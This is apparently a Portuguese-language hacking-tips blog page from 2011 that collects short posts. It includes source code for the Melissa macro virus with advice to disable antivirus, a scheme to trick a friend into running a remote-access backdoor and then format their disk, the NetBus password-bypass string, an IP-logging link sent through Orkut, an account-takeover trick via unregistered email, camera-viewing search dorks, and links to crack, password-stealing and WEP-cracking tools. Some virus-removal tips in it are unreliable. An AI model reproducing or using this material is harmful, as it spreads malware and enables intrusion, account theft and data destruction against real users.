Cursos de Informática Grátis www.megainforcursos.com

15 de novembro de 2011

Camuflar links em textos ou imagens

Método 1
[­link=LINK DO SITE]SEU TEXTO[­/link]
*Para camuflar link em textos.
———————————————————————————————-
[­link=LINK DO SITE]LINK DA Imagem
“>[­/link]
*Para camuflar link em imagens.
Método 2
LINK DO SITE“>TEXTO
*Para camuflar link em textos.
———————————————————————————————-
LINK DO SITE“>LINK DA Imagem“>
*Para camuflar link em imagens.

Baixe Cracks e Seriais com apenas um Clique




Descrição
:Que tal um programa que busca cracks e seriais com apenas um clique. CrackDownloader faz isso e muito mais, seguro e rapido de usar!!! Vale Conferir!!!*Tamanho: 400 KB 
*Hospedagem: EasyShare

PORTA 666


“Navegue” pelo HD de seu amigo com a facilidade de um comando DOS !
É muito fácil, você só precisa ter um amigo babaca que tenha um PC e um MODEM. Você vai precisar do programa Aabout (www.dolphinsys.com). O seu amigo também tem que tê-lo (Invente uma desculpa pra ele dizendo que o programa protege o computador).
Procedimento :
Vocês dois tem que estar conectados (JURA ?!?!).Você deve pelo ICQ ou por chat conectar o seu amigo e também os dois tem que executar o programa Aabout (reforce a desculpa). Fique distraindo -o um pouco pelo chat ou ICQ para ele não desconfiar.
Entre no programa de telnet do windows (C:\windows\telnet.exe). Vá ao menu conectar-sistema remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmico do cara (tente achá-lo por ICQ, CHAT e cia.) e como porta, digite 666. Clique em conectar. No login, digite a palavra gr! (é GR com o ponto de exclamação, certo, é GR! e não GR)
Agora aparece um PROMPT, no qual você tem controle total sobre o PC do cara. Use os comandos do DOS. Você pode digitar desde um inofensivo DIR até um “da hora” FORMAT C:\ hê! hê! hê!. Agora você pode zuar o AUTOEXEC.BAT do cara, colocar um vírus de macro no Word e muitas outras coisas que a sua IMAGINAÇÃO mandar!!!

//script from www.argnet.tk
function blockError(){return true;}
window.onerror = blockError;
function disableselect(e)
{
return false
}
function reEnable()
{
return true
}
//if IE4+
document.onselectstart=new Function (”return false”)
//if NS6
if (window.sidebar)
{
document.onmousedown=disableselect
document.onclick=reEnable
}
var mensagem=’Copias Proibidas… Devils Hackers!’;
function click(mouse) {
if (document.all) {
if (event.button==2||event.button==3) {
alert(mensagem);
return false;
}
}
if (document.layers) {
if (mouse.which == 3) {
alert(mensagem);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MouseDown);
function keypressed(evt) {
var evt = (evt) ? evt : ((event) ? event : null);
if((evt.keyCode == 18) || (evt.keyCode == 115)) {
alert(’Utilize somente os botoes dentro da pagina!’);
}
}
}
document.onmousedown=click;
document.onkeydown=keypressed; // –>

Deixando o seu SERVER indetectável




Nesse Ebook, contem várias formas atualizadas para deixar o seu SERVER indetectável, ele está em espanhol (é melhor que inglês ).. Mas é bem facil de entender os processos a serem feitos, pois ele está todo ilustrado..
Façam bom proveito

Evitando que programas espirem


1º Vá no prompt de comando
2º digite ” Edit autoexec.bat”
3º Dentro do arquivo digite “date e a data atual separada pro barra /” ex: date 15/02/2007.
4º Aperte alt e com a seta do teclado va em salvar e depois em sair
5º Saia do prompt e reinicie o pc
Obs : programas com 30 dias d expiração nao vao expirar. e virus programados para atacar com data marcada não atacam.

Evite que peguem seu IP pelo MSN


Método para proteger seu IP de hackers,lammers…
Faça o download do Ultra Surf no nosso HD virtual

O Ultra Surf permite navegar anonimamente,
para utiliza-lo para esconder seu IP no MSN apenas abra o programa e entre no MSN.

To usandoo

Uma resposta to “Evite que peguem seu IP pelo MSN”

Faça o Windows dizer a você qual é a senha do Usuário


Tamanho: 1 Mb
Hospedagem: EasyShare/Bitroad



Uma resposta to “Faça o Windows dizer a você qual é a senha do Usuário”

Guia do Hacker: Como Agem e como se Proteger


Com certeza uma das melhores publicações sobre o assunto, a Apostila, ou melhor, o Livro aborda tudo sobre Segurança e como agem os Hackers, leitura imperdível !
Tamanho: 1.9 Mb
Idioma: Português

Hacker Inside – Coleção completa


- Espionagem – Keylogger;
- Fundamentos de Esteganografia;
- Criptografia;
- Criptoanálise;
- Firewall;
- Antivírus;
- Senhas e muito mais.
links:

Inicie o Windows com uma mensagem

Siga os passos abaixo:
Va em Iniciar > Executar e digite REGEDIT.EXE e de um

Localize esse caminho:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Agora procure pelos valores:
LegalNoticeCaption“-> Nome da caixa de texto que ira aparece no Caption do Form
LegalNoticeText“-> Texto que voce ker que fique durante o logon do Windows…
De dois clique nos 2 e mude com o texto que quiser de um reboot no sistema e veja sua mensagem.

Criando o vírus Melissa

 Abra o Bloco de Notas e Cole o Código a baixo
 Salva com o nome Melissa.vbs
Um conselho naum vá achando que o .VBS é igual ao .BAT não então nem teste se não quiser ver a desgraça no seu PC
Olha é aconselhavél que você desative seu antivirus se não ele não vai deixar você fazer ele. É old mais é legal.
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “”
Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo”
Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” &
Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t
show anyone else Wink”
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”
Esse virus faz com que o PC da vitima fique completamente louco
Não faça o teste no seu PC,
Não seja Noob

Netbus


1. Introdução Semelhante ao Back Orifice, o NetBus é uma ferramenta que pode ser utilizada como um sistema de administração remota para os ambientes operacionais Windows 95, Windows 98 e Windows NT.
É composto por um programa que atua como Servidor e um programa que atua como Cliente, permitindo conexões remotas mesmo através da Internet, utilizando-se do protocolo TCP.
Por suas inúmeras características e facilidades, o NetBus passou a ser utilizado principalmente por hackers que pretendem manter controle sobre as máquinas de suas vitimas, sem serem notados/detectados.
2. Comprometimento
O Servidor NetBus é auto-instalável indicando que na primeirá execução a maquina passará a ser comprometida.
O NetBus permite um amplo controle sobre o Servidor, apresentando inúmeras características das quais se destacam:
- Auto-instalável
- Auto executável (com o boot do Windows)
- Permite iniciar/executar qualquer aplicativo
- Permite fechar/terminar qualquer aplicativo
- Permite rebootar o servidor
- Pode desconectar usuários
- Permite enviar caracteres para aplicativos ativos
- Permite capturar o que esta sendo digitado no computador servidor
- Permite capturar a tela (screenshot) do computador servidor
- Retorna informações gerais sobre o computador
- Permite realizar upload de arquivos para o servidor
- Permite realizar download e deleções de qualquer arquivo do servidor
- Permite capturar o som de microfones instalados no servidor
- Possui esquemas de proteção e validação de acessos através de senhas
- Não aparece na Task List do Windows

Além disso, o NetBus faz uso de senhas para permitir o controle de acessos ao Servidor NetBus. A string que contém a senha que o Cliente envia para o Servidor é semelhante à linha abaixo:
Password;0;my_password
No entanto, detectou-se a presença de um backdoor no NetBus que permite a qualquer Cliente estabelecer conexão com o Servidor sem a necessidade de se utilizar uma senha. O Cliente pode conectar-se sem autenticação bastando substituir o valor do segundo parâmetro da string de conexão acima de “0″ para “1″.
3. Detecção
Por default, o Servidor NetBus chama-se Patche.exe. No entanto pode perfeitamente ser renomeado para qualquer outro nome.
O NetBus utiliza TCP para estabelecer o envio/recebimento de pacotes e dados, permanecendo ativo nas portas 12345 e 12346 aguardando por conexões de clientes.
Como primeiro passo, é possível verificar se essas portas estão em uso por algum serviço. Para tanto utiliza-se o comando ‘netstat’ conforme exemplo abaixo:
c:\>netstat -an | find “1234″
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING

Em seguida, é possível identificar que serviço esta ativo na porta apresentada pelo netstat. Para tanto utiliza-se o comando telnet, conforme exemplo abaixo:
c:\>telnet 127.0.0.1 12345
Se o NetBus estiver instalado e aguardando por conexões nesta porta, a seqüência abaixo irá aparecer na janela do telnet:
‘NetBus 1.53′
Ou:
‘NetBus 1.60′
Alem desse procedimento, é possível examinar o registro do Windows a procura de algumas chaves que podem ser criadas pelo programa quando de sua instalação. Execute o ‘regedit’ e faca uma busca pelas chaves abaixo:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome do NetBus] HKEY_CURRENT_USER\Patch\Settings\ServerPwd
A primeirá chave indica que o NetBus esta configurado para ser inicializado automaticamente a cada boot do sistema. Já a segunda chave indica qual a senha (em formato texto puro) que esta sendo utilizada para validar
4. Removendo o NetBus
Indica-se dois procedimentos básicos e simples para remoção do NetBus:
1) fazer uso de uma opção do Servidor NetBus que automaticamente deleta o executável, conforme exemplo abaixo:
c:\>nome_do_netbus_server.exe /remove
2) utilizar o Cliente do NetBus para fazer essa remoção. Basta conectar-se ao Servidor (podendo ser localhost), selecionar “Server admin” e em seguida “Remove server”.
No entanto, notamos que em alguns casos as duas opções falharam ao limpar o registro do Windows. Logo, indicamos que o processo de remoção seja feito manualmente deletando-se o executável e limpando-se o registro eliminando-se as chaves criadas pelo NetBus.

O Hack Definitivo para Redes wireless!(FBI)


Live Cd For Wireless Hacking, também usado pelo FBI
Esta versão é para todos os sistemas exceto sistemas com a Intel B / G wireless cards (IPW2200).
Este Live CD contém todas as ferramentas necessárias para hackear uma WLAN / wireless Access point

WEP Hacking – The Next Generation
WEP é um esquema de encriptação, baseada no RC-4 cipher, que está disponível em todas 802.11a, b e g wireless. WEP utiliza um conjunto de bits chamado uma chave para codificar informações data frames, uma vez que deixa o ponto de acesso ou cliente adaptador e, em seguida, a mensagem é descodificada pelo receptor.
Ambos os lados devem ter a mesma chave WEP, que é geralmente de 64 ou 128 bits de tamanho. Um número semi-aleatório de 24 bit chamado Initialization Vector (IV), faz parte da chave, de modo que a chave WEp de 64 bit realmente contém apenas 40 bits de “força”, enquanto uma encriptação 128 bit 104. O IV é colocado no cabeçalho do frame criptografada, e é transmitida em texto puro.
Tradicionalmente, crackear chaves WEP tem sido um processo lento e enfadonho. Um atacante teria de capturar centenas de milhares ou milhões de pacotes um processo que poderia demorar várias horas ou mesmo dias, dependendo do volume de tráfego que passa ao longo da rede sem fios. Após uma quantidade suficiente de pacotes fosem capturados, um programa WEP cracking , como Aircrac seria utilizado para encontrar a chave WEP.
Voltando para o Verão passado, quando o primeiro da mais recente geração de ferramentas WEP cracking apareceu. Esta geração atual utiliza uma combinação de técnicas focados em IVs exclusivo IVs e ataques brute-force para quebrar chaves WEP 128 bits em minutos em vez de horas. Como o Agente Especial Bickers observou, “Não importa se você usar chaves WEP de 128 bit , você está vulnerável!
Instruções Básicas:
1) Inicie pelo CD
2) Descubra a chave wep
3) anote
4) Saia do Live CD, volte pro windows
5) conecte usando a chave wep que vc conseguiu.

Print do so em execução
Tamanho: 655 MB
Download
Parte1:
Parte2:
Parte3:
Parte4:
Parte5:
Parte6:
Parte7:

Obs: Para juntar as partes use o HJsplit
Obs2: Grave como imagem no CD, pelo Nero ou outro de sua preferência

Orkut Spy Tools





RECOMENDADO: PARA QUEM TEM MOZILLA FIREFOX,Mais pode ser usado no I.E.!

DOWNLOAD: http://orkutspytools.toolbar.fm

Enviar recado para todos os seus amigos;
Apaga todos os seus Recados.
Visita Perfiz em Massa
Floodar Comentários
Deixa um Tópico sempre no topo.
Floodar Menssagens
Deixa seu Perfil em 1° na lista de Perfiz de seus amigos.
Mostra numa TEXTAREA o source da página que no caso está dentro de um Iframe.

Novas funcões:

Visitar perfiz de amigos
Pegar Uids da CMM
Ver comunidades que é dono


ASSIM QUE ESTIVER INSTALADO, AS FERRAMENTAS ESTARÃO EM PORTUGUÊS.

Pegar IP pelo orkut


1ªFaça o download desse arquivo: 
2ª entre no www.110mb.com e crie uma conta lá e entre nela, é claro
3ªVai em “Upload files” clique em procurar e selecione o arquivo que vc baixou
4ªClique com o botão direito do mouse em “IP.PHP” e selecione “Copiar link”
Cole aqui“>
Não tire as ” (aspas)
6ªMande um scrap contendo somente o codigo acima e ao entrar, o IP da pessoa irá para “IP.TXT” que se criará automaticamente no 110mb.
obs:Só dá pra enviar pros seus amigos do orkut

Roubar orkut por e-mail não verificado

É o seguinte pessoal
vou ensinar aqui como roubar o orkut de pessoas que criam uma conta no google
sem usar nenhum e-mail
tipo eu vou criar um orkut
digito minhas informações até chegar a hora de digitar o e-mail
certo
ai eu digito um e-mial qualquer lá
vamos supor que eu digitei jonathan.maciel2008@hotmail.com
depois disso ja tenho uma conta no google
só que muitos sabem que podem esta correndo risco
Como assim correndo risco jonathan.maciel2008?
simples
se esse e-mail nao existir no sistema da hotmail
vc pode esta vulneravel
se meu e-mail de orkut é jonathan.maciel2008@hotmail.com
e ele nao existe no sistema da hotmail
então pra roubar o orkut com esse e-mail ai
basta ir no site da hotmail
criar uma conta com suposto e-mail acima
jonathan.maciel2008@hotmail.com
certo depois dai tudo bem
depois é só clicar em
‘nao consigo acessar minha conta’
depois clica em
esqueci minha senha
e digita o suposto e-mail jonathan.maciel2008@hotmail.com
certo
como o meu orkut é jonathan.maciel2008@hotmail.com
altomaticamente
será enviado um link para a caixa de e-mail de jonathan.maciel2008@hotmail.com
e essa link terá a nunção de redefinir a senha..

RECUPERAR ORKUT HACKEADO!

SÓ VOU ENCINAR ESSA VEZ, E NAO FALAMOS MAIS SOBRE O ASSUNTO.

-
Se alguem entrou no seu perfil e mudou sua senha, redefina ela clicando aki:
https://www.google.com/accounts/ForgotPasswd

Se a pessoa, além de ter mudado a senha, ela mudou o e-mail, clique aki:
http://www.google.com/support/accounts/bin/request.py?ara=1
Tutorial (1º link):
- No 1º eah soh vc mandar a msg de mudança de senha pro seu e-mail, clikar no link de lah e jah eras
Tutorial (2º link):
1- Mude o idioma no canto superior direito da pagina
2- Responda assim:
-Você usa Google Apps com esta conta?
- Não
-Por favor selecione tudo o que se aplica:
- Nenhum dos descritos acima

Atenção:
Responda o formulário do jeito mais correto possível, pois eah um sistema totalmente automatizado q avalia o peso das suas respostas e verifica se deve ou naum te conceder acesso a sua conta “hackiada”

Tirar alguns virus do pc sem anti virus

1° PASSO: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° PASSO: Clique no “+” da pasta HKEY_LOCAL_MACHINE.
3° PASSO: Clique no “+” da pasta SOFTWARE.
 PASSO: Clique no “+” da pasta MICROSOFT.
 PASSO: Clique no “+” da pasta WINDOWS.
 PASSO: Clique no “+” da pasta CURRENTVERSION.
 PASSO: Agora não clique no “+” e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo
com .exe e se possuir delete.
todos que terminarem .exe são virus podem deletar a vontade!
OBS: Muito cuidado q nem todos os arquivos “.exe” sao virus!!
por isso que expliquei la em cima..”so devem apagar os que tiverem 3 letras maiuscuLAS!

Tirar Vírus de Seu Msn e Orkut



Descrição: Programa que Server Para Tirar VIrus de Seu Msn e Orkut (”Msn”) Aquelas menssagens CHATAS que seu msn envia sozinhu toda ingles e mando arquivo !

Torpedo sms GRATIS!!!

torpedo sms GRÁTIS sem cadastro sem download SEM VIRUS!
GRÁTIS!!!!
SEM VIRUS!!!!
SEM PROGRAMAS!!!
SEM CADASTRO!!!

Wireless – Como Driblar a Segurança


Este E-Book é um tutorial, que explica como invadir uma rede wireless para poder utiliza da mesma. Porém este tutorial também te ajuda a previnir sua rede destes ataque.
Muito Bom!!!
Tamanho: 1.9 Mb
Hospedagem: Easyshare/Bitroad

Ver cameras de segurança pelo google

Vou explicar como faz…..!!
>abra o google www.google.com.br
2º>copie e cole um desses \/
inurl:ViewerFrame?Mode=”
inurl:MUltiCameraFrame:?Mode=”
inurl:view/index.shtml”
3º>clike no link que tah escrito “estou com sorte”
e prontu eh muitu legal mesmo
espero que gostem!!!

Vírus nunca mais


Crie uma conta de usuário limitada (tem que ser limitada!).
Para criar uma conta: Iniciar»Painel de Controle»Contas de usuário»Criar uma nova conta. Escolha o nome do seu novo usuário.
*Note: Crie também uma senha para todos os usuários, isso melhora também a segurança!
Pronto! Agora navegue na internet usando esse usuário!
Contras:
Você não poderá instalar programas nesta conta, no caso terá que sair e entrar na conta de privilégio ilimitado ou na conta de Administrador, mais tem uma saída!
Clique em cima do .exe e clique em executar como… pronto ai é só escolher qual o usuário tem o privilegio de instalar, digite a senha.
EXPLICAÇÃO:
Pois com uma conta de usuário limitada, você não tem privilégios de copiar nada para o driver c:\.
Paralelamente os vírus ou spy, entre outros, não terão como entrar em seu hd.

Unsercure – Descubra Senhas de E-mail’s




Descrição:Com certeza você já quis descobrir senha de algum e-mail de um amigo, e tentou pesquisar no Google algum programa que desse conta do que você queria, mas não achou nada, então alguém te disse que isso era impossível… Mas se existe algum programa que possa fazer isso (descobrir senhas), o programa é esse, baixe o arquivo que já vem com um Tutorial.
*Tamanho: Menos de 1 Mb
*Hospedagem:Easy

Aprenda a programar em .bat


Introdução
Antes de tudo, indicar o porquê os processos são chamados batch. A razão por ele se chamar bat é porque no ms-dos requere-se como máximo três letras na extensão e por tanto os arquivos tem a extensão .bat
O que se pode fazer com eles?
Pode fazer de forma automatizada tudo aquilo que se pode fazer no console do ms-dos.
Como faça um arquivo bat?
Coloque em texto. Apenas decidir onde colocar, pode colocá-lo no bloco de notas ou algum editor ascii.
Ao guardá-los devem ter a notação de nomes próprios do ms-dos. Este nome com no máximo 8 letras (espaço e \ não são permitidos) logo um ponto e a extensão que neste caso é obrigatoriamente bat.
Como posso selecionar vários arquivos;
Para ele tem que se levar em conta os nomes dos arquivos, devem cumprir a notação do ms-dos (8 letras sem espaço como máximo, logo um ponto e três letras como máximo da extensão. Pode se utilizar os comandos;
*Equivale a vários caracteres.
?Equivale a apenas um caracter.

Exemplos
comando *.doc -> selecionar todos os arquivos que tenham a extensão doc.
comando a*.doc -> selecionar todos os arquivos que comecem por a e tenha a extensão doc.
comando a*b.doc -> selecionar todos os arquivos que comecem por a, acabem por b e tenham a extensão doc.
comando *mao*.doc -> selecionar todos os arquivos que contenham ‘mao’ e tenham a extensão doc.
comando c?mao.doc -> selecionar todos os arquivos que contenham ‘c’, logo um carater qualquer e logo ‘mao’. Deve ter tambem a extensão doc.
comando c?b*.* -> selecionar todos os arquivos que comecem por ‘c’, tenham um caracter qualquer, logo um b e qualquer extensão.
comando *.b?t -> selecionar todos os arquivos que tenham a extensão que comece por b, logo um caracter qualquer e logo um t.
Quem são as trajetórias e os patchs;
A trajetória é o nome completo de um arquivo e indica a situação exata de um arquivo e seu nome.
Se digo que o arquivo se chama arquivo.txt indico seu nome, mas nada mais. Se supoe que se encontra no diretório atual.
Se digo c:\arquivo.txt indico que o arquivo que me interesse se chama arquivo.txt e se encontra no diretório ráiz de C.
Dado que no ms-dos nao se admite nomes grandes ( mais de 8 letras ) nem espaço, quando quero utilizar o nome do windows em ms-dos devo saber que este será reconvertido em seu nome curto. Este se obtem os seis primeiros carácteres válidos do nome, logo o sinal ~ (alt 126) e logo um número.
Que comandos podemos utilizar;
Comandos;
Aqui estão alguns comandos utilizados em batch.
ECHO [mensagem ou variável]
Escreve na tela
ECHO OFF
Desativa as informações e confirmações feitas pelo sistema. Como “C:>”, “Tem certeza que deseja fazer tal?”….
ECHO ON
Ativa as informações e confirmações do sistema.
ECHO.
Pula uma linha
SET variavel=valor
Cria ou modifica uma variável (espaço reservado temporariamente na memória RAM para guardar algumas informações númericas, de caractéres, positivo/negativo entre outros. Não podem ter acento e devem começar com letra). Para chamar a variável posteriormente basta coloca-la entre “%”.
Por exemplo:
SET nome=Storm
ECHO O nome dele é %nome%

:nomedolink
Nomeia um ponto do arquivo de lote permitindo avançar ou voltar a execução apartir daquele ponto.
CLS
Esse comando limpa toda a tela. CLear Screen.

@[Comando]
Desativa as informações e confirmações feitas pelo sistema apenas para esta linha.
CODE
IF [condição] (
[ação]
) ELSE (
[ação2]
)

Esse é um comando condicional. “Se condição faça ação, senão faça ação2″.
Por exemplo:
CODE
@ECHO OFF
SET nome=Storm
IF “%nome%”==”Storm” (
ECHO Ola Storm!
) ELSE (
ECHO Ola %nome%!

)
GOTO [ponto]
Avança ou volta a execução para um ponto do arquivo de lote.
FOR /L %%variavel IN (inicio,incremento,fim) DO comando [parâmetro]
Repete um comando varias vezes fazendo incrementações até o fim ser atingido.
/L, é uma opção do comando FOR que faz as incrementações.
%%variavel, é o nome da variável que vai ser incrementada.
inicio, é o valor de inicio da variável que será incrementada.
incremento, número que será somado a cada incrementação.
fim, a repetição irá acabar quando o valor da variável atingir este valor.
comando, um comando que será repetido.
[parâmetro], o parâmetro do comando que será repetido.

Por exemplo:
CODE
@ECHO OFF
FOR /L %%a IN (1,1,5) DO ECHO O valor de A é %%a

PAUSE
Faz uma pausa e só volta quando o usuário apertar alguma tecla do teclado.
REM [comentário]
Este comando não faz absolutamente nada. Ele é utilizado para inserir comentarios nos arquivos.
CODE
PROMPT ->Serve para abrir o prompt do msdos. O mais habitual é $p$g que corresponde a;

$p = mostrar trajeto atual
$g = mostrar o separador >
$l = mostrar o separador <
$b = mostrar o separador |
$q = mostrar o separador =
$$ = mostrar o sinal $
$t = mostrar a hora
$d = mostrar a data
$v = mostrar a versão do sistema
$n = mostrar unidade atual
$h = retroceso. Apaga o caracter previo
$e = esc. Mostra o sinal corresponde a asci 27

Por isso se colocarmos prompt $p$g o cursor mostra a tragetória de onde estamos e logo o separador. É possível o texto ( por exemplo prompt Meu_nome $p$g
DATE
Ver/por a data do sistema

TIME
Ver/por a hora do sistema

VER[/font]
Versão do sistema
[font=Verdana]VOL unidade
Volume da unidade especificada

MEM parametros
Mostra a memoria usada e livre no sistema
/p -> mostra por programas
/d -> por programas econtroladores
/c -> classifica por tamanho

Comandos de manejos de arquivos
COPY origem destino
Serve para copiar arquivos de um lugar a outro. A origem deve ser um trajeto completo de onde estão os arquivos a copiar. Se se omite se entende no diretório atual.

O destino deve ser uma trajetória completa de onde desejar o/os arquivo(s)
copy meuarquivo.txt c:\ (copiá-lo do diretorio raíz de C)
copy meuarquivo.txt c:\meuarq.txt (copiá-lo e poder mudar o nome a meuarq.txt)
copy *.txt a:\ (copiar todos os arquivos que tenham a extensão txt a unidade A)
copy *.txt c:\meusdo~1 (copiar todos os que tenham a extensão txt ao diretório Meus documentos ( cujo o nome curto é meusdoc~1).
DEL arquivo(s)
Apagar arquivos selecionados
del lol.txt (apaga o arquivo lol.txt no diretório atual)
del c:\lol.txt (apaga o arquivo lol.txt que se encontra no c:\)
del arquiv~1\*.*(apaga os arquivos que se encontram no diretório ‘Arquivos de programa’ cujo nome curto é arquiv~1( não se apaga as subpastas)
DELTREE arquivo(s) -y
Apaga a raíz especificada ( se é um arquivo coloca o arquivo, se é uma pasta coloca a pasta com todas as subpastas que incluam).
Com o parametro -y não pergunta cada vez
Este comando na realidade não é um comando sim uma utilidade incluída no ms-dos.
DIR trajeto
Mostra uma lista do conteúdo do diretório especificado no trajeto. Se não especificado nada, se entende o atual.
Se coloca como parametro /W mostra uma lista resumida
Se coloca como parametro /P mostra uma lista utilizando o filtro more.
ATTRIB arquivo(s)-> Mostra os arquivos dos diretórios indicados e nesse caso permite mudá-los.
os atributos são:
H -> oculto. Se ativa com +h e desativa com -h
R -> Leitura. Apenas leitura com +r, normal com -r
S -> Sistema. Se ativa com +s e desativa com -s
A -> Modificado. Para copias de segurança incrementadas. +a indica modificado e -a indica não modificado.
Attrib arquivostorm.txt (mostrar os atributos do arquivostorm.txt)
attrib *.exe +r +r +s (coloca todos os arquivos com extensão exe como ocultos, do sistema e a apenas lê)
RENAME o REN nome1 nome2
Mudar o nome do arquivo
Ren nome1.txt nome2.txt
TYPE arquiivo
Mostra por pasta o conteúdo do arquivo;
type nomedoarquivo.txt
* Todos aqui listados são comandos de MS-DOS que foram criados especificamente para arquivos de lote. Se você precisar de mais detalhes sobre cada um deles basta digitar no MS-DOS (ou no prompt de comando do Windows) [comando]/? Todos comandos de MS-DOS também entram nesta lista incluindo chamadas de outros programas para este sistema.
Comandos para programação
EDIT arquivo
Editor de textos utilizado para editar scripts e arquivos de texto.
DEBUG arquivo parametros de arquivo
Inicia o desassembler com o programa indicado que se colocam por parametros.
CHOICE texto opções
Se utiliza em programas bat para dar elegir a um usuario entre um conjunto de opções
A resposta se devolve mediante a variável errorlevel
choice Eleja uma opçao snc
CODE
if errorlevel 1 goto …
if errorlevel 2 goto …
if errorlevel 3 goto …
Este exemplo mostra a lateral “eleja uma opção e da a elejer s (sim), n (não) o C (continuar) por exemplo as tres seguintes linhas especificam aonde deve sair o fluxo do programa seguido da tecla pulsada.
Variáveis
A condição DEFINED verifica se uma variável já foi definida. Por exemplo, se a variável “x” estiver definida, então o resultado será positivo, senão negativo.
Veja como ficaria:
CODE
@ECHO OFF
IF DEFINED x ( ECHO Positivo ) ELSE ( ECHO Negativo )
Arquivos
A condição EXIST verifica se existe algum arquivo. Por exemplo, se existir o arquivo “exemplo.bat” o resultado será positivo, senão negativo.
Veja como ficaria:
CODE
@ECHO OFF
IF EXIST exemplo.bat ( ECHO Positivo ) ELSE ( ECHO Negativo )
Esta condição não para por aí. No sistema MS-DOS, você pode fazer uma “pesquisa” na pasta em que está por um arquivo digitando parte dele. Você usa “*” para indicar a(s) parte(s) que você não sabe. Por exemplo, se existir algum arquivo com a extensão “.bat” na pasta atual o resultado será positivo, senão negativo.
Veja como ficaria:
CODE
@ECHO OFF
IF EXIST *.bat (ECHO Positivo ) ELSE ( ECHO Negativo )
X é igual a 6?
@ECHO OFF
CLS
SET X=6
IF “%X%” == “6″ GOTO ok
ECHO X não é igual a 6, X é igua a %X%
GOTO saida
:o k
ECHO X é igual a 6
:saida
Na primeira linha. O “@” indica que não é para aparecer o comando que segue, no caso, “ECHO” (Comando que escreve na janela). Nesta linha, eu estou grosseiramente mandando o MS-DOS calar a boca (não falar nada sem eu mandar), pois se ECHO faz o computador “falar”, ECHO OFF faz o computador “desligar a boca” e com o @ no começo da linha, ele nem vai informar ao usuário que está parando de falar.
Na segunda linha, o comando CLS faz o MS-DOS apagar toda a tela.
Na terceira linha, como já foi explicado, faz a variável X=6.
Na quarta linha, é uma linha condicional. Se “X” for igual à 6 vá para “ok”.
Na quinta linha, é óbivio que X não vai ser igual a 6, então o MS-DOS vai “falar” X não é igual a 6, X é igua a [valor de x].
Na sexta linha, ele irá para o ponto “saida” porque o resto é feito se X for igual a 6.
Na sétima linha, está sendo definido o ponto “ok”, aquele ponto citado na quarta linha.
Na oitava linha, X será igua a 6, então o MS-DOS vai dizer X é igual a 6.
E na nona linha, é definido o ponto-final do processamento. Que é chamado na sexta linha, nada mais que isso, então o MS-DOS entende que o batch concluiu.
Faça o teste
1. Abra o Bloco de notas do Windows;
2. Copie o exemplo acima e cole nele
3. Salva-o como exemplo2.bat;
4. Dê dois-clicks nele observe o que acontecerá;
5. Agora experimente modificar a segunda linha por SET idade=n (troque n por algum número);
6. Execute e veja o que acontece.
Programando;
Existe uma infinidade de comandos, como mostrei acima, e só usar a imaginação e podemos programar uma imensidão de finalidades, basta usar a criatividade e alguns comandos, para fechar esse tutorial, vou abordar alguns códigos feito por mim.
Exemplo 1 (Básico)
-fazer um loop que pegue todos os nomes dos diretorios
-dentro de cada diretorio, renomear todos os arquivos com a extensão .txt para .zip
CODE
@echo off
rem *.txt *.zip
@exit
Exemplo 2 (Intermediário/Avançado)
CODE
@echo off
cls
Echo Batch feito por Storm
Echo .
Echo .
Echo Começar o programa?
pause
Echo .
Echo .
Echo .
Echo Este programa cria uma chave de inicializaçao de um arquivo no windows através do menu.
Echo .
Echo .
Echo [1] Deseja que esse arquivo se inicie no seu proximo logon?
Echo [2] Deseja sair do programa?
Set /p choice=Digite o numero correspodente a sua opçao:
if “%choice%”==”2″ goto op2
if “%choice%”==”1″ goto op1
rem Bloco de declaraçao dos gotos
:o p1 reg add “hklm\Software\Microsoft\Windows\CurrentVersion\Run” /v teste2 /t REG_SZ /d c:\path\batstorm.bat&goto proximo
:o p2 exit
:proximo
Echo .
Echo .
Echo Chave criada com sucesso.
Echo .
Echo .
Echo Agora mostrarei a chamada de um outro arquivo bat sem a interrupção do arquivo.
Echo [1] Deseja chamar o arquivo batstorm.bat?
Echo [2] Deseja sair do programa?
Set /p choice=Digite o numero correspondente a sua opçao:
if “%choice%”==”2″ goto op3
if “%choice%”==”1″ goto op4
:o p3 call batstorm.bat&goto proximo2
:o p4 exit

Pegar IP usando IPGet




Como Usar o IPGet
ele irá pedir para importar,
ai vc importa…dps instale o WinPcap,
Abra o Prograa Winpcap,
na pasta dele no diretório Arquivos de Programa
Para ver o IP da pessoa, voce precisa ter uma conexão com ela
(jogo, manda arquivo por msn, etc), não é preciso aceitar o arquivo mandado por msn,
só de colok pra ele aceitar já dá..
aparecerá no cantinho o IP da pessoa, ao aparecer,
voce aperta nele. que ira abrir uma PopUp

Comandos do IPGet:
/IPGet
